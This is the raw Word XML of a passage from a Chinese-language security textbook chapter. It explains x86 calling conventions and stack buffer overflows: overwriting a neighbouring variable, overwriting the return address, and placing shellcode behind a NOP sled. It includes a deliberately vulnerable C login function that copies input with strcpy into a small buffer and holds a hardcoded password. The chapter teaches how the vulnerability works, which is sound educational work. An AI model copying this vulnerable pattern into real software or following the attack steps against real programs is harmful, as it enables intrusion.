              <w:t>_cdecl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27F6CE70"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右到左</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="425A6139"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调用者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="7A276614" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="520735DF"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_</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>_stdcall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79AA9F2C"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右到左</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21A96228"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被调用者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="3A6FC286" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54840D64"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_</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>_fastcall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6902A68B"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右到左</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25BC0DF2" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>被调用者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C865EB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对于VC编译器，默认使用_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_stdca</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ll，调用的函数的参数从最右边开始入栈，当函数返回时，会通过add指令对esp进行平衡（或者通过mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,ebp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指令来恢复esp），回收栈帧，接着恢复esp和ebp，执行ret指令，返回调用者。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EBF8ED" w14:textId="5FEE7D33" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003D7125">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.5 栈溢出修改局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB99EB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函数中的局部变量一般是相邻的，但可能因为编译器的配置不同而出现不同的情况，具体的情况需要通过动态调试确定。当一个变量可能被溢出时，相邻的变量就可能被覆盖篡改，从而使程序的执行结果不可预测甚至更糟糕。接下来通过一个例子来说明栈溢出修改局部变量带来的后果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280A039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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有漏洞的登录验证函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23383AC8"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3F33C15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define PASS “123456”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D8A76"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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> login(char* passwd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3405B8D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5A91FAF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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nt res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56635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c</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>har buff[8];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662D2F7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res=strcmp(passwd,PASS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E82803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strcpy(buff,passwd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D4FE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return res;//0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录失败，1登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256EA13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202A939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这是一个登录验证程序的部分代码，先比较密码，得到正确与否的判断，然后将用户输入的密码拷贝到buff里面。执行时栈帧空间分布（请注意：buff与res的位置关系可能因</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>编译器的配置不同而不同）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6CE9F0"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FF21BB3" wp14:editId="661D94E4">
            <wp:extent cx="4349909" cy="291600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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4349909" cy="2916000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19576D1D"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.6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相邻局部变量覆盖图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A01AB9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如上图所示，buff的溢出会覆盖res的值，也就是说buff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[8-11]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的内容将写入到res变量中，那么res值对攻击者来讲就是可控的了，res又是登录成功与否的判断依据，那么攻击者就不再需要正确的密码就可以登录成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D212A62" w14:textId="268FD2E1" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003D7125">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.6 栈溢出修改返回地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C63B99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上一节介绍的修改局部变量的方法非常有用，但是实现的条件苛刻，如果res在buff上面，就不会被覆盖了，而这种情况是很有可能的。另一种攻击方式是修改函数的返回地址，返回地址一定在buff的高地址的位置，可以被覆盖。依然假设栈帧空间中的分布如上一节所示图，那么buff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[12-15]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是ebp，buff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[16-19]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是返回地址，buff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[20-23]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是函数的参数。所以当向passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[16-19]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是“0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>41414141</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”时，在函数返回时，返回地址是“0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>41414141</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”，那么执行完ret指令后，CP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会跳转到0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>41414141</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处将那里的字节数据视为代码开始执行，而此时一般会报异常（因为0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>41414141</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存放的很可能不是代码，将数据视为指令来执行，容易不符合逻辑和规则，导致崩溃）。所以将返回地址任意的覆盖一般只会引起程序崩溃，不会有实际的攻击意义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D45E80"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17E5DA21" wp14:editId="67EDDBA8">
            <wp:extent cx="4554187" cy="3021138"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4564031" cy="3027668"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="663A439E"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.7 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恶意覆盖函数返回地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6440EC8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如果将返回地址刻意的返回到特定的代码区呢？比如在Linux系统下，返回到system函数，让程序执行system</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(“/bin/sh”)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，运行完这个函数后，与程序交互的攻击者就将获得一个与执行程序有同样权限的shell，可以非法获取或修改一些数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BFA322" w14:textId="04679286" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003D7125">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.7 栈溢出注入攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E214E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上节的介绍仅仅是任意覆盖返回地址是无法实现某种攻击的，而是需要将返回地址覆盖为特定的值，让程序执行到攻击者可控的位置或特定的函数中。攻击者通过栈溢出攻击程序时，输入都在栈空间，如果攻击者想要程序执行自己的代码，那么就需要将EIP修改为指向栈空间的地址，而这一目的可以通过修改函数返回地址为栈空间的地址来实现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7748118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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有漏洞的登录验证函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D4F8F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5F606AC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define PASS “123456”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EC697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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> login(char* passwd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896138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1077149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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nt res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435D4E0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c</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>har buff[128];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8646D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res=strcmp(passwd,PASS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5358951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strcpy(buff,passwd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085BD43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return res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E830E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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A98E6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对之前的漏洞程序做了修改，增大buff的空间，给攻击代码足够的空间来植入。在攻击者输入passwd之前：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8AF8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（1）调试程序，确定buff到返回地址的距离。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3402AB2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（2）分析获取buff的起始地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DD51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（3）构建恶意输入，可以将前1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个字节由9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（nop指令）和攻击代码组成，将buff的首地址写到返回地址对应的偏移处。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41946A8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然后用户将精心构造的输入给程序，覆盖栈空间后的示意图如下。当函数返回时，EIP会变为0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1112</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FB</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，开始从buff的起始地址执行指令，buff空间内全是合法的指令（nop指令和恶意代码），因此可以顺利执行下去，完成攻击者指定的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6DBEF"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B10BAA9" wp14:editId="3BD5BE2F">
            <wp:extent cx="4860842" cy="3212276"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4867510" cy="3216683"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F05070"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.8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将恶意代码植入栈中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664AD93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一般将用户的输入称为payload、将其中的恶意代码称为shellcode，现实中payload的编写并不如理论描述这样简单，过程中将会遇到很多障碍。比如：在大端存储的环境下，且buff的地址中的最高字节是0x00，那么根据strcpy函数的功能，返回地址在覆盖为buff首地址时会发生截断，低3字节不会再被覆盖。</w:t>
